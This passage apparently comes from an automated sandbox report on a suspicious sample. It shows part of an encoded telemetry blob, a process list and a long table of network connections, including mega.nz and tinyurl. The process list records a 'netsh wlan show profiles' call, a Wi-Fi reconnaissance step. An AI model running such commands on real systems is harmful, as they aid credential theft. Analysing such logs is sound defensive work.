uY2hfY291bnQ9IjEiIGxhc3RfbGF1bmNoX3RpbWU9IjEzMzU4NjEwOTMyMTk1Njc3MCI-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSIxMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQyNDU0MjIyNjQiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQyNDU1Nzg2NTYiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjM4MzgiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1MTI1NjgwNzYzIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJkbyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvNGFkZDFhZWQtNDdiOC00MDhjLTlmMDQtMzMwZWZiYzYwZTM5P1AxPTE3MTY0NzAyNTAmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9REVxdWFYcjc2UENqY1VGaTNIak9FSjhOY2pzRGpGZ2xnbHA0TmF4cTFpaFFwRjVxS0t5OUpjUTNGcTBTJTJmSzJpckFtOTRxaFdjNm5NQlpCemxhJTJmbFlBJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUxMjU4MzcxNzIiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzRhZGQxYWVkLTQ3YjgtNDA4Yy05ZjA0LTMzMGVmYmM2MGUzOT9QMT0xNzE2NDcwMjUwJmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PURFcXVhWHI3NlBDamNVRmkzSGpPRUo4TmNqc0RqRmdsZ2xwNE5heHExaWhRcEY1cUtLeTlKY1EzRnEwUyUyZksyaXJBbTk0cWhXYzZuTUJaQnpsYSUyZmxZQSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3MjgwMTA4MCIgdG90YWw9IjE3MjgwMTA4MCIgZG93bmxvYWRfdGltZV9tcz0iODU5NzkiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUxMjU5OTM0MDEiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUxNDA1MjQ1MzMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY3NTciIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1NjE0NTg3MDUyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iODc1IiBkb3dubG9hZF90aW1lX21zPSI4Nzk3OSIgZG93bmxvYWRlZD0iMTcyODAxMDgwIiB0b3RhbD0iMTcyODAxMDgwIiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSI0NzQwNiIvPjxwaW5nIGFjdGl2ZT0iMSIgYT0iMjAiIHI9IjIwIiBhZD0iNjMyNSIgcmQ9IjYzMjUiIHBpbmdfZnJlc2huZXNzPSJ7QjI5RjM4NDItQkJBMy00NTc0LTk1OTItOUJFNTczRjM2RDAxfSIvPjwvYXBwPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIxMjQuMC4yNDc4Ljk3IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJFVVdWIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMCIgaW5zdGFsbGRhdGU9IjYzNDIiIGNvaG9ydD0icnJmQDAuMjAiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iLTEiIHJkPSItMSIgcGluZ19mcmVzaG5lc3M9IntGRUQ0QzRFNi1BMUIzLTQ3NEYtOEMyMS1CMzRBMEI1NEMwNDB9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Windows\SYSTEM32\cmd.exe
"cmd"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\uxdvyy.odt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.83.221.88.in-addr.arpa | udp |
| BE | 88.221.83.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 131.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| FR | 216.58.213.78:443 | clients2.google.com | udp |
| FR | 216.58.213.78:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 78.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | www.win-rar.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.68.195.51.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | zxx.groovesell.com | udp |
| US | 104.17.142.116:443 | zxx.groovesell.com | tcp |
| US | 104.17.142.116:443 | zxx.groovesell.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | core.spreedly.com | udp |
| US | 8.8.8.8:53 | js.mollie.com | udp |
| US | 8.8.8.8:53 | js.stripe.com | udp |
| US | 8.8.8.8:53 | staxjs.staxpayments.com | udp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| US | 8.8.8.8:53 | js.braintreegateway.com | udp |
| US | 8.8.8.8:53 | kit.fontawesome.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | js.authorize.net | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.18.40.68:443 | kit.fontawesome.com | tcp |
| US | 151.101.2.182:443 | core.spreedly.com | tcp |
| US | 151.101.0.176:443 | js.stripe.com | tcp |
| US | 151.101.0.176:443 | js.stripe.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| SE | 192.229.221.25:443 | js.braintreegateway.com | tcp |
| SE | 192.229.221.25:443 | js.braintreegateway.com | tcp |
| US | 34.111.145.109:443 | js.mollie.com | tcp |
| US | 104.18.17.199:443 | staxjs.staxpayments.com | tcp |
| US | 104.18.13.54:443 | js.authorize.net | tcp |
| SE | 192.229.221.25:443 | js.braintreegateway.com | tcp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 8.8.8.8:53 | ka-f.fontawesome.com | udp |
| US | 8.8.8.8:53 | 116.142.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.145.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.17.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.13.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.221.229.192.in-addr.arpa | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 8.8.8.8:53 | t.paypal.com | udp |
| US | 151.101.1.35:443 | t.paypal.com | tcp |
| US | 8.8.8.8:53 | m.stripe.network | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 151.101.1.35:443 | t.paypal.com | tcp |
| US | 8.8.8.8:53 | v1.gdapis.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 172.67.200.87:443 | v1.gdapis.com | tcp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.26.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.200.67.172.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 67.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| FR | 142.250.178.142:443 | www.youtube.com | tcp |
| FR | 142.250.178.142:443 | www.youtube.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| US | 8.8.8.8:53 | 142.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| FR | 142.250.75.230:443 | static.doubleclick.net | tcp |
| FR | 172.217.20.170:443 | jnn-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | 237.202.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.75.250.142.in-addr.arpa | udp |
| FR | 216.58.213.78:443 | www.youtube.com | udp |
| FR | 216.58.213.78:443 | www.youtube.com | tcp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 174.20.217.172.in-addr.arpa | udp |
| FR | 216.58.213.78:443 | www.youtube.com | udp |
| FR | 216.58.213.78:443 | www.youtube.com | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 84.69.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.212.206:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| FR | 216.58.214.162:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | rr2---sn-hgn7rn7r.googlevideo.com | udp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 162.214.58.216.in-addr.arpa | udp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| FR | 142.250.75.230:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 231.130.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | tcp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.200.46:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| FR | 172.217.20.193:443 | yt3.ggpht.com | tcp |
| FR | 172.217.20.193:443 | yt3.ggpht.com | tcp |
| FR | 172.217.20.193:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 193.20.217.172.in-addr.arpa | udp |
| FR | 172.217.20.193:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | rr5---sn-hpa7znzy.googlevideo.com | udp |
| IT | 173.194.10.10:443 | rr5---sn-hpa7znzy.googlevideo.com | tcp |
| IT | 173.194.10.6:443 | rr1---sn-hpa7znzy.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 10.10.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.10.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-hpa7knle.googlevideo.com | udp |
| IT | 173.194.18.74:443 | rr5---sn-hpa7knle.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 74.18.194.173.in-addr.arpa | udp |
| IT | 173.194.18.74:443 | rr5---sn-hpa7knle.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr3---sn-hpa7kn7d.googlevideo.com | udp |
| IT | 74.125.99.168:443 | rr3---sn-hpa7kn7d.googlevideo.com | udp |
| US | 8.8.8.8:53 | 168.99.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-hpa7znzr.googlevideo.com | udp |
| IT | 173.194.6.42:443 | rr5---sn-hpa7znzr.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr4---sn-hpa7znz6.googlevideo.com | udp |
| US | 8.8.8.8:53 | 42.6.194.173.in-addr.arpa | udp |
| IT | 74.125.111.105:443 | rr4---sn-hpa7znz6.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr1---sn-hpa7knl7.googlevideo.com | udp |
| IT | 74.125.11.70:443 | rr1---sn-hpa7knl7.googlevideo.com | udp |
| US | 8.8.8.8:53 | 105.111.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.11.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr1---sn-hpa7knll.googlevideo.com | udp |
| IT | 173.194.18.134:443 | rr1---sn-hpa7knll.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr3---sn-hpa7kn76.googlevideo.com | udp |
| IT | 74.125.99.136:443 | rr3---sn-hpa7kn76.googlevideo.com | udp |
| US | 8.8.8.8:53 | 134.18.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.99.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-hpa7knle.googlevideo.com | udp |
| IT | 173.194.18.72:443 | rr3---sn-hpa7knle.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr3---sn-hpa7zns6.googlevideo.com | udp |
| IT | 173.194.182.168:443 | rr3---sn-hpa7zns6.googlevideo.com | udp |
| US | 8.8.8.8:53 | 72.18.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.182.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tinyurl.com | udp |
| US | 172.67.1.225:443 | tinyurl.com | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | 225.1.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.145.216.31.in-addr.arpa | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.14:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 132.169.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.125.203.66.in-addr.arpa | udp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 66.203.125.14:443 | g.api.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | gfs270n879.userstorage.mega.co.nz | udp |
| LU | 89.44.168.139:443 | gfs270n879.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 139.168.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gfs208n176.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs206n186.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs270n439.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs204n176.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs214n174.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs262n371.userstorage.mega.co.nz | udp |
| FR | 185.206.26.86:443 | gfs208n176.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.86:443 | gfs208n176.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.86:443 | gfs208n176.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.86:443 | gfs208n176.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.129:443 | gfs204n176.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.129:443 | gfs204n176.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.129:443 | gfs204n176.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.129:443 | gfs204n176.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.81:443 | gfs262n371.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.81:443 | gfs262n371.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.81:443 | gfs262n371.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.81:443 | gfs262n371.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.96:443 | gfs206n186.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.96:443 | gfs206n186.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.96:443 | gfs206n186.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.96:443 | gfs206n186.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.9:443 | gfs270n439.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.9:443 | gfs270n439.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.9:443 | gfs270n439.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.9:443 | gfs270n439.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 86.26.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.24.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.36.24.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.37.24.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.148.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.27.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| FR | 216.58.214.162:443 | googleads.g.doubleclick.net | udp |
| FR | 142.250.178.142:443 | www.youtube.com | udp |
| FR | 142.250.178.142:443 | www.youtube.com | tcp |
| FR | 142.250.178.142:443 | www.youtube.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| FR | 216.58.213.78:443 | clients2.google.com | udp |
| FR | 216.58.213.78:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | www.rarlab.com | udp |
| DE | 51.195.68.162:443 | www.rarlab.com | tcp |
| DE | 51.195.68.162:443 | www.rarlab.com | tcp |
| US | 8.8.8.8:53 | 162.68.195.51.in-addr.arpa | udp |
| DE | 51.195.68.162:443 | www.rarlab.com | tcp |
| DE | 51.195.68.162:443 | www.rarlab.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| FR | 142.250.179.97:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | www.winzip.com | udp |
| NL | 23.194.209.160:443 | www.winzip.com | tcp |
| NL | 23.194.209.160:443 | www.winzip.com | tcp |
| US | 8.8.8.8:53 | 97.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.optimizely.com | udp |
| GB | 2.23.160.149:443 | cdn.optimizely.com | tcp |
| US | 8.8.8.8:53 | a25968344087.cdn.optimizely.com | udp |
| BE | 104.68.82.206:443 | a25968344087.cdn.optimizely.com | tcp |
| US | 8.8.8.8:53 | 160.209.194.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.160.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.82.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 8.8.8.8:53 | unpkg.com | udp |
| US | 8.8.8.8:53 | installer.corel.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.17.246.203:443 | unpkg.com | tcp |
| US | 13.107.246.64:443 | www.clarity.ms | tcp |
| US | 107.23.42.175:443 | installer.corel.com | tcp |
